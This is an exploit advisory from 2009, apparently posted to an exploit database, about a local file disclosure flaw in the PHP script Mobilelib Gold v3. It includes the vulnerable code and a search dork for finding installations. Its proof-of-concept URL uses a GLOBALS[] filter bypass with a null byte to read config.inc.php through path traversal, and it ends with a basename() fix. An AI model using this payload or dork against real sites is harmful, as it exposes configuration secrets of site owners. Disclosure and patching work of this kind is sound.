Mobilelib Gold v3 Local File Disclosure Vulnerability
2009-07-14 20:07:07|| || | ||
o_,_7 _|| . _o_7 _|| q_|_|| o_\\\_,
( : / (_) / ( .
___________________
_/QQQQQQQQQQQQQQQQQQQ\__
__/QQQ/````````````````\QQQ\___
_/QQQQQ/ \QQQQQQ\
/QQQQ/`` ```QQQQ\
/QQQQ/ \QQQQ\
|QQQQ/ By Qabandi \QQQQ|
|QQQQ| |QQQQ|
|QQQQ| From Kuwait, PEACE... |QQQQ|
|QQQQ| |QQQQ|
|QQQQ\ iqa[a]hotmail.fr /QQQQ|
\QQQQ\ __ /QQQQ/
\QQQQ\ /QQ\_QQQQ/
\QQQQ\ \QQQQQQQ/
\QQQQQ\ /QQQQQ/_
``\QQQQQ\_____________/QQQ/\QQQQ\_
``\QQQQQQQQQQQQQQQQQQQ/ `\QQQQ\
``````````````````` `````
=Vuln:
=INFO: http://www.ac4p.com/
=BUY: http://www.ac4p.com/
=Download: ~~~
=DORK: intext:"English for dummies"
____________
_-=/:Conditions:\=-_
````````````````````````````````````````````````````````````````````````````````
Magic_quotes MUST BE ON :)
---------------------------------------===--------------------------------------
_________________
_-=/:Vulnerable_Code:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
_______
_-=/:P.o.C:\=-_
````````````````````````````````````````````````````````````````````````````````
We will bypass the security, where it takes all _GET variables and scans if
they contain harmful tags such as the null char (%00) ..etc
We will bypass it by using an old GLOBALS[] trick ;)
http://localhost/goldv3/myhtml.php?GLOBALS[page]=../config.inc.php%00
---------------------------------------===--------------------------------------
__________
_-=/:SOLUTION:\=-_
````````````````````````````````````````````````````````````````````````````````
// in "./myhtml.php"
function getthememyhtml($page)
{
$page = basename($page); //<---- Added the good old Basename func ;)
if (file_exists("./myhtmlpages/".$page.".html")) {
$templat="./myhtmlpages/".$page.".html";
$tempindex=@fopen($templat,"r");
$html=@fread($tempindex,@filesize($templat));
@fclose($tempindex);
} else {
$html ="<p align=\"center\"> áã íÓÊØÚ ÅíÌÇÏ ãáÝ ÇáÞÇáÈ.</p>";
}
return $html;
}
---------------------------------------===--------------------------------------
______________________________________________________________________________
/ \
| Sec-Code.com ;) Shru7at Iktshaf al-thaghrat Qareeban!!il7ag sajjil!! |
\______________________________________________________________________________/
\ No More Private /
`````````````````
Salamz to All Muslim Hackers.
#
Fixes
No fixesIn order to submit a new fix you need to be registered.